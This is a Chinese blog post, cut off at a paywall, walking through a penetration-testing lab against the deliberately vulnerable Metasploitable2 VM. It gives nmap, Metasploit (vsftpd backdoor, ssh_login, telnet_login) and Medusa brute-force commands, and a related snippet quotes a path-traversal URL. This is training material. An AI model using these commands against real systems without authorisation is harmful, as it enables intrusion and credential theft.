Metasploitable2靶机渗透笔记

已于 2023-08-07 23:16:28 修改
阅读量1k 收藏 4
点赞数 4
分类专栏: 靶机笔记 文章标签: 安全 网络 linux windows
于 2023-07-20 03:10:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_60600840/article/details/131818715
版权
本文详细记录了对Metasploitable2靶机的渗透过程,包括信息收集、统计和利用三个阶段。涉及的攻击手段包括VSFTPD、SSH、Telnet、CGI/FastCGI、DDoS、SMB、exec、java-rmi、ingreslock、nfs、ftp、MySQL、distccd、Postgresql、vnc、UnrealIRCd和tomcat的漏洞利用,主要使用Metasploit框架进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集阶段

由于是Vmware中的靶机,所以不做真实IP、旁站、C段、WAF等信息的收集

端口收集:

nmap -sS -sV 靶机IP

获得开放的服务信息:
在这里插入图片描述

统计阶段

  1. VSFTPD 2.3.4(笑脸漏洞)
  2. SSH登录爆破
  3. Telnet爆破
  4. http-CGI/FastCGI
  5. HTTP-DDOS拒绝服务攻击
  6. SMB任意命令执行
  7. exec账密爆破
  8. java-rmi反序列化
  9. ingreslock后门
  10. nfs文件共享漏洞
  11. ftp弱口令
  12. MySQL弱口令
  13. distccd任意命令执行
  14. Postgresql弱口令
  15. vnc弱口令
  16. UnrealIRCd漏洞
  17. tomcat弱口令

利用阶段

VSFTPD 2.3.4

利用方式:

  1. metasploit模块利用
  2. 笑脸:)利用(需要目标机器开启6200端口)
  3. ftp爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search vsftpd:搜索利用模块
在这里插入图片描述
use exploit/unix/ftp/vsftpd_234_backdoor:使用模块
options:查看需要配置的参数
set rhost 192.168.137.170:设置目标IP
run:开始运行

成功拿到shell

在这里插入图片描述

SSH爆破

利用方式:

  1. metasploit模块利用
  2. ssh爆破

ssh爆破
使用Medusa美杜莎工具爆破该靶机的SSH账密
medusa -M ssh -h 192.168.137.170 -U user.txt -p pass.txt -f -t 5
在这里插入图片描述

使用metasploit中的利用模块

msfconsole:进入metaspolit
search ssh_login:搜索利用模块
use auxiliary/scanner/ssh/ssh_login:使用模块
options:查看需要配置的参数
在这里插入图片描述
set rhosts 192.168.137.170:设置目标机IP
set user_file 用户名字典路径
set pass_file 密码的字典路径
set threads 10:设置线程数量
run:运行
在这里插入图片描述

Telnet爆破

利用方式:

  1. metasploit模块利用
    测试的Hydra和Medusa都无法爆破Telnet,如果是利用错误或者有其他的利用方式希望各位师傅可以为我指出,谢谢啦!

使用metasploit中的利用模块

msfconsole:进入metaspolit
search telnet_login:搜索利用模块
use scanner/telnet/telnet_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170&#

最低0.47元/天 解锁文章
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1910
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
DC-1靶机渗透笔记
qq_60600840的博客
08-08 323
DC-1靶机安全渗透靶机
Metasploitable2使用指南
热门推荐
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
Metasploitable2靶机
最新发布
cjchsh的博客
04-07 1229
Metasploitable2靶机
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 7941
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable 2靶机
小小猪的博客
06-19 369
Metasploitable 2靶机 arp-scan -l 扫描靶机IP地址
metasploitable2靶机
雨泽网络工作室
08-16 5444
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
看完这篇 教你玩转渗透测试靶机——Metasploitable2
weixin_54626591的博客
07-19 699
看完这篇 教你玩转渗透测试靶机——Metasploitable2
渗透测试-Metasploitable2靶机
道阻且长,行则将至
02-22 8555
靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)_msf6怎么用
2401_83621095的博客
04-15 1001
直接访问 https://xxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini。这个模块的运行背后的逻辑是,检测漏洞,通过调用jenksin的脚本命令行,从设定SVRHOST的位置执行并下载的shell并回连监听口。
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
xueshenlaila的博客
03-02 3352
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机
weixin_46035615的博客
04-14 4986
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 1万+
Metasploitable2靶机渗透学习
靶机Metasploitable2的安装
m0_65992344的博客
07-23 1414
靶机Metasploitable2的安装
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1543
Metasploitable2靶机渗透linux系统实操
Metasploitable2靶机学习
m0_46371267的博客
10-13 4423
Metasploitable2靶机渗透 什么是Metasploitable2Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
metasploitable 2
YUKIDDDD的博客
08-05 1540
metasploitable 21.介绍2.信息收集3.漏洞利用 1.介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 2.信息收集 nmap -sC -sV -p1-65535 192.168
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值